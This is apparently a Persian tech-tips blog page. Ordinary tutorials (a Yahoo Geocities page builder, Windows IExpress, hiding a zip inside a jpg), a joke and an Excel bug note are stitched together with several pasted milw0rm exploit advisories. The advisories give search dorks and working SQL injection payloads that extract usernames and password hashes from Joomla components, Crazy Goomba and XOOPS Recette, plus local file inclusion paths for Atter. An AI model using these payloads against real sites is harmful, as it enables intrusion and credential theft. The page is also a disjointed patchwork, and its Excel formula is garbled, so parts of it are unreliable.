برای دیدنش به ادامه مطالب بروید
اینم از آموزش نصب مودم در لینوکس که به صورت فایل pdf و زیپ شده است
######################################################### # # # Joomla Component Profiler Blind SQL Injection # # # ######################################################### ######################################## [~] Vulnerability found by: $hur!k'n [~] Contact: alibabanala@hotmail.com ######################################## [~] ScriptName: "Joomla" [~] ModuleName: "Profiler" [~] Version: ? ######################################## [~] DORK: allinurl:com_comprofiler ######################################## [~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL] [~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/
ماجراي طنز
روزي
مردي به سفر ميرود و به محض ورود به اتاق هتل ، متوجه ميشود که هتل به
کامپيوتر مجهز است . تصميم ميگيرد به همسرش ايميل بزند . نامه را مينويسد
اما در تايپ ادرس دچار اشتباه ميشود و بدون اينکه متوجه شود نامه را
ميفرستد . در اين ضمن در گوشه اي ديگر از اين کره خاکي ، زني که تازه از
مراسم خاک سپاري همسرش به خانه باز گشته بود با اين فکر که شايد تسليتي از
دوستان يا اشنايان داشته باشه به سراغ کامپيوتر ميرود تا ايميل هاي خود را
چک کند . اما پس از خواندن اولين نامه غش ميکند و بر زمين مي افتد . پسر
او با هول و هراس به سمت اتاق مادرش ميرود و مادرش را بر نقش زمين ميبيند
و در همان حال چشمش به صفحه مانيتور مي افتد:
گيرنده : همسر عزيزم
موضوع : من رسيدم
ميدونم
که از گرفتن اين نامه حسابي غافلگير شدي . راستش انها اينجا کامپيوتر
دارند و هر کس به اينجا مي اد ميتونه براي عزيزانش نامه بفرسته . من همين
الان رسيدم و همه چيز را چک کردم . همه چيز براي ورود تو رو به راهه .
فردا ميبينمت . اميدوارم سفر تو هم مثل سفر من بي خطر باشه . واي چه قدر
اينجا گرمه !!
شايد حالا وقت آن رسيده باشد تا حضور خود را در وب اعلام نماييد. توسط!Yahoo شما مي توانيد وب سايتي را در شبكه جهاني اينترنت به صورت رايگان ايجاد نماييد و اطلاعاتي را در مورد خود، خانواده، كار و يا هر عنواني كه دوست در آن بگذاريد. براي ايجاد يك صفحه خانگي، يا هو ۱۵ مگابايت فضا در اختيار شما مي گذارد. شما مي توانيد صفحه امپراطور ترفندها وبي متناسب با اين فضا طراحي كرده و در وب به نمايش بگذاريد.
شروع كار:
۱- آدرس www.yahoo.com را در نوار آدرس مرورگر خود وارد و كليد Enter را در صفحه كليد فشار دهيد.
۲-
در قسمت بالاي صفحه بر روي گزينه Geocities كليك كرده و در صفحه باز شده
Username (نام كاربر) و Password (كلمه رمز) خود را وارد نموده و كليد
Sign In را كليك نماييد.
۳- در صفحه باز شده بر روي گزينه Yahoo! Page wizard كليك نماييد.
توسط اين گزينه شما مي توانيد با پيروي از دستورات صفحه نمايش به سادگي يك صفحه وب را ايجاد نماييد.
۴-
در صفحه باز شده شما مي توانيد انواع الگوهاي از پيش ساخته شده جهت ساخت
صفحه وب مورد نظرتان استفاده نماييد، بر روي يكي از الگوها كليك نماييد.
۵-
در صفحه ظاهر شده شما مي توانيد صفحه وب انتخابي خود را در رنگهاي مختلف
مشاهده نماييد. با توجه به سليقه خود يك رنگ را انتخاب كنيد.
۶- در صفحه Welcome to Yahoo بر روي Begin كليك نماييد.
۷- در صفحه Chooses a look for your page شما مي توانيد يكي از سبكهاي موجود صفحه را انتخاب نموده و بر روي كليد Next نماييد.
نكته: در صورتي كه مي خواهد پيش نمايشي از سبك انتخابي را مشاهده نماييد در اين قسمت بر روي كليد Preview كليك نماييد.
۸-
در صفحه Enter your into در قسمت your name نام خود و در قسمت Your email
address آدرس Email خود را وارد كنيد. نام و آدرس Email وارد شده در اين
قسمت در صفحه وب شما ظاهر مي گردد.
۹- در صفحه Pick your picture شما
مي توانيد تصويري را به دلخواه به صفحه وب خود اضافه نماييد. براي اضافه
نمودن تصويري از كامپيوتر خود به صفحه وب در حال ساخت بر روي كليد Upload
New Image كليك كرده و در پنجره ظاهر شده بر روي كليد Browse كليك كنيد و
عكس مورد نظر خود را از روي كامپيوتر خود انتخاب كرده و بر روي كليد
Upload كليك كنيد. بعد از چند لحظه تصوير انتخابي به صفحه وب اضافه مي
گردد.
نكته: شما در اين قسمت مي توانيد از تصاوير پيش فرض نيز استفاده
نماييد و يا در صورت عدم تمايل به داشتن عكس بر روي گزينه Donشt use an
image كليك كنيد.
براي رفتن به مرحله بعد بر روي كليد Next كليك كنيد.
۱۰- در صفحه Describe yourself در كادرهاي مربوطه توضيحاتي را در مورد خود و علايق خود وارد نماييد و بر روي Next كليك نماييد.
۱۱- در صفحه Enter your favorite links شما مي توانيد آدرس هاي دلخواه خود را به صورت لينك وارد كرده و بر روي كليد Next كليك كنيد.
۱۲-
در قسمت Describe your friends and family شما مي توانيد توصيفي از
خانواده و دوستانتان وارد نماييد و بر روي كليد Next كليك نماييد.
۱۳-
در صفحه Enter your friends and family شما مي توانيد اسامي دوستانتان را
به صورت لينك درآوريد بعد از وارد كردن اسامي بر روي كليد Next كليك كنيد.
۱۴- در صفحه Name your page شما مي توانيد اسمي را براي صفحه وب خود تعريف كرده و بر روي كليد Next كليك نماييد.
۱۵-
در صفحه Congratulations به شما به خاطر ساخته شدن صفحه خانگي در سايت
Yahoo تبريك گفته مي شود.شما مي توانيد آدرس صفحه خانگي ساخته شده را به
دوستانتان بدهيد تا از آن ديدن نمايند.
نكته: در مثال فوق ما از الگوي
از پيش ساخته شده Personal Page را استفاده كرديم لذا توضيحات داده شده در
اين قسمت مربوط به اين الگو مي باشد. در صورتي كه شما از الگوي صفحه وب
ديگري استفاده كنيد ممكن است گزينه هاي آن با تعاريف داده شده در اين قسمت
تفاوت داشته باشد.
یکی از دغدغه های اصلی برنامه نویسان و سازندگان محصولات و برنامه های کامیپوتری ساخت Setup برای نصب و Install برنامه ساخت شده بر روی سیستم کاربران است. برای این کار برنامه های مختلف و حرفه ای ساخته شده اما هر کدام این نرم افزارها دارای پیچیدگی های خاصی هستند. در این ترفند قصد داریم به معرفی یکی از ابزارهای مخفی ویندوز XP بپردازیم که با بهره گیری از آن میتوانید یک Setup تمام و کمال بسازید. بدون اینکه نیاز به برنامه جانبی دیگری داشته باشید.
بدین منظور:
ابتدا از قسمت Start گزینه Run را انتخاب کنید و در آن کلمه ی Iexpress را تایپ کنید . متظر بمانید تا پنجره ی Iexpress ظاهر شود .[ A L G E R I A S E C U R I T Y C R E W ] ########################################## # # [ Joomla Component FlippingBook 1.0.4 SQL Injection ] # ########################################## [~] Vulnerability found by: cO2 [ Algeria Security Crew ] [~] Contact: c02[at]hotmail.de [~] Website: http://www.Dz-Secure.com [~] Greetings: to all hackers DZ . . . ########################################## [~] ScriptName : 'Joomla' [~] ModuleName : 'FlippingBook' [~] Version() : 1.0.4 ########################################### # # DORK 1 : inurl:com_flippingbook # ########################################### [+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook [+]Exploit : /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/* ########################################### [+] : you can see the password in 'Title' [+] : Open the source page to see the 'password' ########################################### # milw0rm.com [2008-04-22]
##########CANAKKALE GECiLMEZ############################## Crazy Goomba 1.2.1 SQL inj dork: :(( sory author: ZoRLu home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com ) contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn ) Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da :(( Not: http://www.z0rlu.ownspace.org acIklarýn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :)) ###################CANAKKALE GECiLMEZ################### http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL] [SQL] 1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/** ( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas ) md5 i kýr ve giris yap http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion ( login ) sonra admin panele baglan admin panel: http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php ###################CANAKKALE GECiLMEZ#################### thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) ) Efsane: YILDIRIMORDULARI.ORG Dersler BasladI Sanal Bitti :((( ###################CANAKKALE GECiLMEZ#################### # milw0rm.com [2008-04-21]
ترفند اگر روی فایل دابل کلیک کنید فقط یک عکس مشاهده خواهید کرد
برای این کار از دستور زیر در داس DOS استفاده کنید
برای رفتن به داس در منوی RUN دستور CMD را تایپ کنید و بعد از باز شدن داس دستور زیر را تایپ کنید
copy /b photo.jpg+file.zip file.jpg
منظور از کلمه photo در بالا همان عکسی است که باید نشان داده شود و منظور از کلمه file.zip همان فایل زیپ شده است
برای باز کردن این فایل هم کافی است برنامه winrar بر روی سیستم شما نصب باشد
برای باز کردن این فایل بر روی آن راست کلیک کرده و از زیر منوی Open With... گزینه winrar را انتخاب کنید.
########################################## # # XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####MAÝL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : allinurl :"modules/recipe" # ########################################### EXPLOIT : modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2 Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/* ########################################### Submitter: sbruchet Publisher: Cba Updated On: 2006/03/06 Version: 2.2 Downloads: 2853 File Size: 162 bytes Home Page: Not Specified download link: http://www.xoops.org/modules/repository/singlefile.php?cid=43& ;lid=1524 ########################################### ##################S@BUN#################### ########################################### #####hackturkiye.hackturkiye@gmail.com##### ########################################### # milw0rm.com [2008-04-19]
اما اين باگ چيست؟
> اکنون به وسيله يک ماشين حساب يا حتي ماشين حساب خود ويندوز دو عدد 850 و 77.1 را در هم ديگر ضرب کنيد. حاصل طبعأ 65535 خواهد شد.
> اما اکنون اين کار را به وسيله اکسل 2007 ، قوي ترين نرم افزار محاسباتي انجام دهيد! در ميان تعجب حاصل 100,000 خواهد شد! يک عدد رند و کاملأ بي ارتباط!
> فرمول ضرب اين دو عدد در اکسل نيز SUMPRODUCT(850,77.1) 0= ميباشد.
> جالب اينکه علاوه بر اعداد فوق ، اين باگ بر روي اعداد ديگري نيز پابرجاست. بحث کاملي پيرامون اين موضوع در يکي از گروه هاي گوگل مطرح شده که به نتايجي نيز رسيده است .
Atter 0.9.1 Local File Inclusion Vulnerability ################################################# Author : KnocKout ThanX : CW ALL USERS ================================================= Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5 Attackz : http://localsite.com/path/include/functions.inc.php?class=[Local File] http://localsite.com/path/include/common.inc.php?file=[Local File] ################################################# # milw0rm.com [2008-04-19]
